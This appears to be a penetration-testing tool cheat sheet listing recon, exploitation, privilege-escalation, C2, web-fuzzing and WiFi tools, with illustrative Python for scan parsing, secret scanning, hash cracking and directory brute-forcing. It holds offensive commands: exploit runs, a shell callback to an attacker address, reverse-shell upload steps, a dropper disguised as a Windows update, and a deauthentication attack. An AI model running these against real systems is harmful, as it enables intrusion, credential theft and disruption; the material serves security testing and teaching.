Information Gathering / Enumeration

Nmap (Network Mapper) is used to discover hosts and services on a computer network by sending packets and analyzing the responses. References: NSEDoc Reference Portal; Nmap Cheat Sheet; the "Usage and Examples" and "Firewall/IDS Evasion and Spoofing" chapters of Nmap Network Scanning.
# Default scripts, version detection, all TCP ports, normal-format output to "output".
# --min-rate 10000 is fast but noisy and can drop ports on lossy links; lower it when accuracy matters.
nmap -sC -sV -p- --min-rate 10000 <target-ip> -oN output
Batea: the goal of Batea is to allow security teams to automatically filter interesting network assets in large networks using nmap scan reports (it consumes the XML written by -oX).
# Complete info
$ sudo nmap -A -oX output.xml <target>

# Partial info
$ sudo nmap -O -sV -oX output.xml <target>

$ batea -v output.xml
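Both Nmap and Batea work from the XML report written by -oX. The Python below is an added example, not code from the page, Nmap or Batea: it parses a constructed nmap XML report, keeps only open ports on live hosts, and applies a simple, hypothetical triage list of service names. Batea's own ranking is machine-learned, so the triage here stands in for the idea, not for Batea's implementation; the sample XML, the host addresses and HIGH_VALUE_SERVICES are all assumptions made for this example.

```python
import xml.etree.ElementTree as ET

# Constructed sample in nmap -oX format (not real scan output), trimmed to the
# elements the parser reads.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX output.xml 10.0.0.0/30">
  <host>
    <status state="up"/>
    <address addr="10.0.0.1" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="8.9p1"/></port>
      <port protocol="tcp" portid="80"><state state="open"/>
        <service name="http" product="nginx" version="1.18.0"/></port>
      <port protocol="tcp" portid="443"><state state="filtered"/></port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="10.0.0.2" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/>
        <service name="microsoft-ds" product="Samba smbd" version="4.6.2"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/>
        <service name="ms-wbt-server"/></port>
    </ports>
  </host>
</nmaprun>
"""


def parse_open_ports(xml_text):
    """Return [(ip, proto, port, service, product, version), ...] for open ports on live hosts."""
    root = ET.fromstring(xml_text)
    results = []
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        ip = addr_el.get("addr")
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # filtered/closed ports are not worth a row
            svc = port.find("service")
            results.append((
                ip,
                port.get("protocol"),
                int(port.get("portid")),
                svc.get("name", "") if svc is not None else "",
                svc.get("product", "") if svc is not None else "",
                svc.get("version", "") if svc is not None else "",
            ))
    return results


# Hypothetical triage rule (an assumption of this example, not Batea's model):
# services that usually deserve a first look on an internal network.
HIGH_VALUE_SERVICES = {"microsoft-ds", "ms-wbt-server", "ms-sql-s", "vnc", "ldap", "kerberos-sec"}


def triage(results):
    """Split parsed ports into (high_value, other) by service name."""
    high = [r for r in results if r[3] in HIGH_VALUE_SERVICES]
    other = [r for r in results if r[3] not in HIGH_VALUE_SERVICES]
    return high, other


if __name__ == "__main__":
    high, other = triage(parse_open_ports(SAMPLE_NMAP_XML))
    for ip, proto, port, name, product, version in high:
        print(f"[!] {ip}:{port}/{proto} {name} {product} {version}".rstrip())
    for ip, proto, port, name, product, version in other:
        print(f"    {ip}:{port}/{proto} {name} {product} {version}".rstrip())
```

Swap SAMPLE_NMAP_XML for the contents of output.xml to run it against a real scan; the parser only relies on the host/status/address/ports/port/state/service elements that every -oX report contains.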
Binwalk is a fast, easy-to-use tool for analyzing, reverse engineering, and extracting firmware images.
# Extract any file that it finds
binwalk -e firmware.bin
Creates phishing websites to harvest credentials and other information.
Censys reduces your Internet attack surface by continually discovering unknown assets and helping remediate Internet-facing risks.
Shodan is a search engine for Internet-connected devices ("the Internet of Everything"). Example query for Apache servers in Norway answering 200 on port 80:
apache country:no port:80 http.status:200
Dig (Domain Information Groper) is a command-line utility that performs DNS lookups by querying name servers and displaying the result. A specific server is given with a leading @:
dig [@server] [name] [type]
DNSdumpster is a FREE domain research tool that can discover hosts related to a domain. Search for domain.
Enum4Linux is a tool for enumerating information from Windows and Samba systems.
enum4linux -a <host>
EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if known.
./EyeWitness.py -f urls.txt --web
Insomnia: API queries with a GUI. See website.
Masscan is an Internet-scale port scanner. It can scan the entire Internet in under 5 minutes, transmitting 10 million packets per second, from a single machine. Scan all ports on a target range (0.0.0.0/0 is the whole Internet; keep an exclude list and a packet rate your uplink can actually sustain):
masscan -p0-65535 <target-range>
Maltego is a very powerful data mining tool that offers an endless combination of search tools and strategies.
SIPvicious OSS is a set of security tools that can be used to audit SIP-based VoIP systems. Specifically, it allows you to find SIP servers, enumerate SIP extensions and finally crack their passwords. See GitHub for full documentation.
Steghide is a steganography program that is able to hide data in various kinds of image and audio files.
$ steghide embed -cf picture.jpg -ef secret.txt
Enter passphrase:
Re-Enter passphrase:
embedding "secret.txt" in "picture.jpg"... done
ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely. See GitHub.
theHarvester gathers names, emails, IPs, subdomains, and URLs from public sources.
theHarvester -d <domain> -b google
Social Searcher is a social media search engine. n/a
Sn1per discovers hidden assets and vulnerabilities in your environment. See GitHub.
Gitleaks (GitHub – gitleaks/gitleaks) is a SAST tool for detecting and preventing hardcoded secrets like passwords, API keys, and tokens in git repos. Scan the current repository, including its history, with verbose output:
gitleaks detect --source . -v
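Gitleaks works by running a rule set of regular expressions, each optionally gated by an entropy threshold, over file contents and git history. The Python below is an added example of that mechanism, not Gitleaks' code or its shipped rules: three rules of this example's own design are applied to constructed file contents. The AWS key ID used is the AKIAIOSFODNN7EXAMPLE placeholder from the AWS documentation; the file names, the token and the 3.5-bit entropy threshold are assumptions. The entropy gate is what separates a real-looking token from a template value such as a row of x's.

```python
import math
import re
from collections import Counter

# Constructed file contents. The AWS key ID is the AKIAIOSFODNN7EXAMPLE placeholder
# from the AWS documentation; every other value is made up for this example.
SAMPLE_FILES = {
    "config/settings.py": [
        "DEBUG = True",
        'AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"',
        'DB_PASSWORD = "changeme_changeme_1"',  # low entropy: a placeholder, not a secret
    ],
    "deploy/.env": [
        "API_TOKEN=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",  # zero entropy: a template value
        "SECRET_TOKEN=Zq7pL2vN9xR4kT8wB1yH6mC3sD5fG0jA",  # high entropy: looks like a real token
    ],
    "keys/id_rsa": [
        "-----BEGIN OPENSSH PRIVATE KEY-----",
        "b3BlbnNzaC1rZXktdjEAAAAA...",
        "-----END OPENSSH PRIVATE KEY-----",
    ],
}

# Rules in the shape Gitleaks uses (an id, a regex whose group "s" captures the
# secret, and a minimum Shannon entropy for that capture). These three rules are
# this example's own, not Gitleaks' shipped configuration.
RULES = [
    ("aws-access-key-id", re.compile(r"(?P<s>AKIA[0-9A-Z]{16})"), 0.0),
    ("private-key", re.compile(r"(?P<s>-----BEGIN (?:RSA|EC|DSA|OPENSSH) PRIVATE KEY-----)"), 0.0),
    ("generic-assignment",
     re.compile(r"(?i)(?:secret|token|password|api[_-]?key)\w*\s*[:=]\s*['\"]?(?P<s>[A-Za-z0-9/+=_\-]{16,})"),
     3.5),
]


def shannon_entropy(s):
    """Bits of entropy per character: 0.0 for a repeated character, 5.0 for 32 distinct ones."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def redact(secret):
    """Keep enough of the match to locate it without copying the secret into the report."""
    return f"{secret[:4]}...({len(secret)} chars)"


def scan_lines(path, lines):
    """Apply every rule to every line of one file; return a list of finding dicts."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        for rule_id, regex, min_entropy in RULES:
            m = regex.search(line)
            if m is None:
                continue
            secret = m.group("s")
            if shannon_entropy(secret) < min_entropy:
                continue  # matches the pattern but is a placeholder/template value
            findings.append({"file": path, "line": lineno, "rule": rule_id, "match": redact(secret)})
    return findings


def scan_files(files):
    """Scan {path: [lines]} and return all findings in file/line order."""
    findings = []
    for path, lines in files.items():
        findings.extend(scan_lines(path, lines))
    return findings


if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f['file']}:{f['line']} [{f['rule']}] {f['match']}")
```

The generic rule deliberately requires both a keyword and a 16-character value, and still drops anything with less than 3.5 bits of entropy per character; that combination is what keeps `DB_PASSWORD = "changeme_changeme_1"` out of the report while the 32-character mixed-case token stays in.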

Exploitation

Repository for the EternalBlue exploit. See repository.
Infection Monkey is a free open-source network penetration testing tool. It is a breach and attack simulator that uses real-world attack techniques and known vulnerabilities.
Metasploit is an exploitation framework that automates exploiting known vulnerabilities. Start the interactive console with:
msfconsole
Windows-php-reverse-shell is a PHP reverse shell for Windows implemented with a binary, based on a webshell. Usage: change the IP and port in windows-php-reverse-shell.php, upload it, set up a listener on your machine, then access windows-php-reverse-shell.php on the server.
SQLmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. To get a list of basic options and switches use:
python sqlmap.py -h
IIS 6.0 BOF – RCE: buffer overflow in the ScStoragePathFromUrl function of the WebDAV service.
python2 <exploit.py> <target-ip> <target-port> <src-ip> <src-port>
Drupalgeddon2: Drupal core – Highly critical – Remote Code Execution – SA-CORE-2018-002.
ruby drupalgeddon2.rb <TARGET>
Windows Kernel Exploits: list of kernel exploits. See GitHub.

Password Crackers

Hashcat is an offline password (hash) cracking tool: it recovers plaintexts from captured hashes. See cheat sheet.
Hydra is a parallelized network logon cracker (online brute force against a live service). The tool is proof-of-concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized remote access to a system. See cheat sheet.
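Hashcat's core loop is simple: take a candidate from the wordlist, hash it with the target algorithm, and compare the result against every loaded hash at once. The Python below is an added example of that loop, not Hashcat's or Hydra's code, run over a constructed hash file. The mode numbers 0, 100 and 1400 are Hashcat's for raw MD5, SHA-1 and SHA-256; the user names, wordlist and dispatch table are this example's assumptions. Real cracking is done on a GPU with Hashcat, but the example shows why unsalted hashes fall together and why one hash computation per candidate covers every target.

```python
import hashlib

# Hashcat mode numbers for the raw, unsalted algorithms this example handles
# (0, 100 and 1400 are Hashcat's; the dispatch table itself is this example's own).
ALGORITHMS = {0: "md5", 100: "sha1", 1400: "sha256"}

# Constructed wordlist (a real run would use rockyou.txt or similar).
WORDLIST = ["123456", "letmein", "password", "Summer2024!", "qwerty"]

# Constructed hash file grouped by mode as {user: hexdigest}. The digests are the
# well-known hashes of the plaintexts noted beside them; "erin" is a dummy value
# that no candidate will produce.
HASHES = {
    0: {
        "alice": "5f4dcc3b5aa765d61d8327deb882cf99",  # md5("password")
        "bob": "e10adc3949ba59abbe56e057f20f883e",    # md5("123456")
    },
    100: {
        "carol": "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8",  # sha1("password")
    },
    1400: {
        "dave": "5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8",  # sha256("password")
        "erin": "0" * 64,  # not derivable from WORDLIST: stays uncracked
    },
}


def digest(mode, candidate):
    """Hash one candidate with the algorithm for this mode."""
    return hashlib.new(ALGORITHMS[mode], candidate.encode()).hexdigest()


def crack(mode, user_hashes, wordlist):
    """Dictionary attack: hash each candidate once and look it up against all targets.

    Returns {user: plaintext} for every hash that was recovered."""
    # Invert the target list so a lookup is O(1) and identical hashes (same password,
    # no salt) are recovered together from a single candidate.
    wanted = {}
    for user, hexdigest in user_hashes.items():
        wanted.setdefault(hexdigest.lower(), []).append(user)
    cracked = {}
    for word in wordlist:
        for user in wanted.pop(digest(mode, word), []):
            cracked[user] = word
        if not wanted:  # everything recovered; no need to finish the wordlist
            break
    return cracked


def crack_all(hash_sets, wordlist):
    """Run crack() for every mode present in the hash file."""
    return {mode: crack(mode, users, wordlist) for mode, users in hash_sets.items()}


if __name__ == "__main__":
    for mode, recovered in crack_all(HASHES, WORDLIST).items():
        for user, plaintext in recovered.items():
            print(f"mode {mode}: {user}:{plaintext}")
```

Salted schemes (Hashcat modes such as 1410 for sha256($pass.$salt)) break the shared-lookup trick: each user's salt forces a separate hash computation per candidate, which is the whole point of salting.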

Privilege Escalation

BeRoot Project is a post-exploitation tool that checks common misconfigurations to find a way to escalate privileges.
usage: beRoot.exe [-h] [-l]

Deepce: Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE).
# Make the script executable and then run it
chmod +x ./deepce.sh
./deepce.sh

GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems (SUID bits, sudo rules, capabilities). See website.
LinEnum lists possible PrivEsc vectors. See GitHub.
linPEAS lists possible privesc vectors.
./linpeas.sh
winPEAS lists possible privesc vectors.
winpeas.exe or winpeas.bat
linuxprivchecker lists possible privesc vectors.
linux-exploit-suggester lists possible privesc vectors by matching known exploits against the running kernel. Run locally.
./linux-exploit-suggester.sh
windows-exploit-suggester lists possible privesc vectors by comparing systeminfo output against the Microsoft security bulletin database. Run locally (fetch the database first with --update).
./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt
PowerSploit\PowerUp.ps1 aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations. See GitHub for its full potential. To execute on target, see my cheat sheet.
PowerSploit\PowerView.ps1 is a series of functions that perform network and Windows domain enumeration and exploitation. See GitHub for its full potential. To execute on target, see my cheat sheet.
Juicy Potato and its variants leverage a privilege escalation chain based on the BITS service and a local MITM listener; it works when the current token holds the SeImpersonate or SeAssignPrimaryToken privilege.
MS10-059 (Chimichurri): Vulnerability in the Tracing Feature for Services Could Allow an Elevation of Privilege (982799).
chimichurri.exe <attacker-ip> <attacker-port>
Polkit CVE-2021-4034 (PwnKit) in pkexec, a SUID-root program that is installed by default on every major Linux distribution. Run the exploit on the target to get a root shell:
python3 <exploit.py>


C2 – Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers.
C2 – PoshC2 is a proxy-aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement. See GitHub.
C2 – Cobalt Strike gives you a post-exploitation agent and covert channels to emulate a quiet long-term embedded actor in your customer's network.
C2 – Empire is a post-exploitation framework that includes a pure-PowerShell 2.0 Windows agent and a pure Python 2.6/2.7 Linux/OS X agent.
C2 – Starkiller (Empire frontend) is a frontend for PowerShell Empire.
./starkiller-<version>.AppImage --no-sandbox
C2 – Meterpreter PS1 starts a listener server on a Windows or Linux attacker machine and generates one-liner PowerShell reverse-shell payloads obfuscated with BXOR under a random secret key plus a further layer of character/variable obfuscation, to be executed on the victim machine. Deliver dropper/payload to the target machine (apache2):
USE THE 'Attack Vector URL' TO DELIVER '' (dropper) TO TARGET .. UNZIP (IN DESKTOP) AND EXECUTE 'Update-KB4524147.bat' (Run As Administrator)..
C2 – Alan Framework is a post-exploitation framework useful during red-team activities.
C2 – Sliver is an open source cross-platform adversary emulation/red team framework; it can be used by organizations of all sizes to perform security testing. Linux one-liner (it pipes a downloaded script straight into a root shell, so download and read the script first rather than trusting the pipe):
curl <install-script-url>|sudo bash
and then run sliver

Armitage is a Java-based GUI front-end for the Metasploit Framework developed by Raphael Mudge. Its goal is to help security professionals better understand hacking and help them realize the power and potential of Metasploit.
Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.
$ chisel server --port $PORT --proxy <fallback-url>
# listens on $PORT and forwards ordinary web requests to <fallback-url>, so the port looks like a normal web server
sshuttle allows you to create a VPN connection from your machine to any remote server that you can connect to via ssh.
sshuttle [options] -r [username@]sshserver[:port] <subnets ...>
Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need for SOCKS). See GitHub.
C2 – Havoc (GitHub – HavocFramework/Havoc) is a modern and malleable post-exploitation command and control framework, created by @C5pider. A newer C2 framework that, at the time of writing, was reported to evade Windows 11 Defender. See GitHub.
C2 – Brute Ratel C4 ("Badger doesn't care. It takes what it wants!") is a customized command and control center for red team and adversary simulation.

Web Application

Burp Suite is a framework of web application pentesting tools (intercepting proxy, scanner, repeater, intruder). It is used to perform web app testing.
DIRB is a Web Content Scanner. It looks for existing (and/or hidden) web objects.
dirb <url_base> [<wordlist_file(s)>] [options]
Dirbpy is a new version of dirb written in Python. This version is faster than the C version because it uses threads. Dirbpy is a Web Content Scanner that looks for hidden web objects.
dirbpy -o -u https://[....].com
Dirhunt is a web crawler optimized for searching and analyzing directories.
$ dirhunt <url>
ffuf is a fast web fuzzer written in Go. The keyword FUZZ marks where each wordlist entry is substituted:
ffuf -w /path/to/wordlist -u https://target/FUZZ
Feroxbuster is a tool designed to perform forced browsing.
./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx
Gobuster is a tool used to brute-force:
URIs (directories and files) in web sites.
DNS subdomains (with wildcard support).
Virtual Host names on target web servers.
Open Amazon S3 buckets.
gobuster dir -u http://<target> -w <wordlist>
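DIRB, Dirbpy, ffuf, Feroxbuster and Gobuster's dir mode all do the same basic thing: request every wordlist entry (optionally with a set of extensions) as a path and report each response whose status is not "not found". The Python below is an added example of that loop, not code from any of those tools. It starts a constructed local web server with a few hidden paths, brute-forces it with a made-up wordlist, and treats 401 and 301 as hits because an access-denied or redirecting path still tells you it exists. The server, paths and wordlist are assumptions made for this example.

```python
import http.server
import socketserver
import threading
import urllib.error
import urllib.request

# Constructed target: the paths this local server knows about and how it answers them.
KNOWN_PATHS = {
    "/index.html": (200, b"<html>home</html>"),
    "/admin/": (401, b"auth required"),      # exists, but denies access
    "/backup.zip": (200, b"PK\x03\x04"),     # forgotten archive
    "/old/": (301, b""),                     # redirects, which still proves it exists
    "/.git/HEAD": (200, b"ref: refs/heads/main\n"),  # exposed repository metadata
}


class _Handler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        code, body = KNOWN_PATHS.get(self.path, (404, b"not found"))
        self.send_response(code)
        if code == 301:
            self.send_header("Location", self.path.rstrip("/") + "/new/")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the console quiet
        pass


def start_server():
    """Start the constructed target on an ephemeral loopback port; return (base_url, server)."""
    srv = socketserver.TCPServer(("127.0.0.1", 0), _Handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{srv.server_address[1]}", srv


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Report 3xx as a result instead of following it: the redirecting path is the finding."""
    def redirect_request(self, *args, **kwargs):
        return None


# No proxy (so a proxy in the environment cannot swallow loopback requests), no redirects.
_OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}), _NoRedirect)


def probe(url):
    """Return the HTTP status code for a GET of url."""
    try:
        with _OPENER.open(url, timeout=5) as resp:
            return resp.getcode()
    except urllib.error.HTTPError as e:
        return e.code


def brute_force(base_url, words, extensions=(), ignore=(404,)):
    """Request each word as a file, as a directory, and with each extension; return {path: status} hits."""
    hits = {}
    for word in words:
        candidates = ["/" + word, "/" + word + "/"] + ["/" + word + ext for ext in extensions]
        for path in candidates:
            code = probe(base_url + path)
            if code not in ignore:
                hits[path] = code
    return hits


# Constructed wordlist (a real run uses e.g. the SecLists directory lists).
WORDLIST = ["index", "admin", "backup", "old", ".git/HEAD", "login", "api"]


def run_demo():
    """Start the target, brute-force it with WORDLIST plus common extensions, shut it down."""
    base, srv = start_server()
    try:
        return brute_force(base, WORDLIST, extensions=(".html", ".zip", ".php"))
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    for path, code in sorted(run_demo().items()):
        print(f"{code} {path}")
```

The `ignore` set is the same idea as ffuf's -fc / gobuster's -b filters: on a target that answers every unknown path with 200 or 302 you have to calibrate what "not found" looks like (status, size or word count) before the output means anything.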
Fuxploider is able to detect the file types allowed to be uploaded and which technique will work best to upload web shells or any malicious file to the desired web server.
python3 fuxploider.py --url <url> --not-regex "wrong file type"
FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing (attack payload and predictable-resource wordlists).
Nikto is a web server scanner.
nikto -h <target>
Raccoon is a security tool for reconnaissance and information gathering.
Usage: raccoon [OPTIONS] TARGET
Sublist3r is a Python tool designed to enumerate subdomains of websites using OSINT. To enumerate subdomains of a specific domain:
python sublist3r.py -d <domain>
JoomScan automates the task of vulnerability detection and reliability assurance in Joomla CMS.
perl joomscan.pl [options]
Droopescan is a plugin-based scanner for several CMSs, mainly Drupal and SilverStripe, with limited support for others. Scan a Drupal site with 32 threads:
droopescan scan drupal -u <url> -t 32
Crawleet is a recon and exploitation tool.
python <script> -u <URL>
wafw00f identifies and fingerprints the Web Application Firewall (WAF) product in front of a site; knowing which WAF is present is the first step to bypassing it.
wafw00f http://target

Active Directory Environment

BloodHound (BloodHoundAD) uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment.
Impacket is a collection of Python classes for working with network protocols (SMB, MSRPC, Kerberos, LDAP and more). NOT LIMITED TO AD ENVIRONMENTS.
Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing. NOT LIMITED TO AD ENVIRONMENTS. See GitHub.
PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. NOT LIMITED TO AD ENVIRONMENTS. See GitHub.

Malware Analysis (MA) / Buffer Overflow (BOF)

MA: Ghidra is a software reverse engineering (SRE) suite of tools developed by NSA's Research Directorate in support of the Cybersecurity mission.
BOF: PEDA (Python Exploit Development Assistance for GDB) adds exploit-development helpers to GDB. See GitHub.

WiFi / Wireless

Aircrack-ng is a complete suite of tools to assess WiFi network security. It covers:

Monitoring: packet capture and export of data to text files for further processing by third-party tools
Attacking: replay attacks, deauthentication, fake access points and others via packet injection
Testing: checking WiFi cards and driver capabilities (capture and injection)
Cracking: WEP and WPA PSK (WPA 1 and 2)
# Deauth attack: one deauth burst (-0 1) spoofed from the AP (-a) to the client (-c) on interface ath0
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

# Start airodump-ng on channel 9, locked to the AP's BSSID, to collect the WPA authentication handshake into psk*.cap
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0
BoopSuite is a set of tools written in Python designed for wireless auditing and security testing.
BoopMon [-h] [-v] [-c [CHANNEL [CHANNEL ...]]] [-k] [-n NAME] -i {} [-m MAC]
Kismet is a wireless network and device detector, sniffer, wardriving tool, and WIDS (wireless intrusion detection) framework.